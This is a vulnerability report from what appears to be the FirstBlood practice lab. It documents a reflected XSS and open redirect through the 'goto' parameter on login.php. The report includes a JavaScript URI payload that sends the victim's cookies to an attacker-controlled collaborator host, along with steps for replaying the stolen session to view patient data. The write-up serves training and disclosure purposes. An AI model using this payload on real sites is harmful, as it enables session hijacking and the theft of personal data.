FirstBlood-#432 — Open Redirect on login page with "goto" parameter leading to account takeover
This issue was discovered on FirstBlood v2
On 2021-10-25, xnl-h4ck3r Level 4 reported:
Summary
There is a hidden parameter called goto
on /login.php
that redirects to another location after login.
There is an open redirect vulnerability that allows an attacker to creaft a URL to send to the victim so after they login on the genuine First Blood site, they are redirected to the attackers website, and the auth cookies are also passed to the attackers site. The web application fails to filter the javascript URI upon redirecting
Steps to Reproduce
- Go to the link
http://firstbloodhackers.com:{PORT}/login.php?goto=j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie
- Enter a valid user name and password and click SECURE LOGIN
- Observe that the user is taken to the attackers website, and the cookies and their values have been leaked to the attacker:
- Clear all cookies and go to the web app again but do not log in.
- Add the cookie shows in Step 3 and go to
/drpanel/index.php
and observe that you are now logged in as admin and view patient data.
Impact
If a victim goes to the web app using this link and logs in, the attacker is able to capture the auth cookies and redirect the user wherever they want. The user may be unaware what has happened, and the attacker can use the cookies to access the doctor management panel as them and view patient PII data.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie`
FirstBlood ID: 39
Vulnerability Type: Reflective XSS
Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug
ID 26
because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.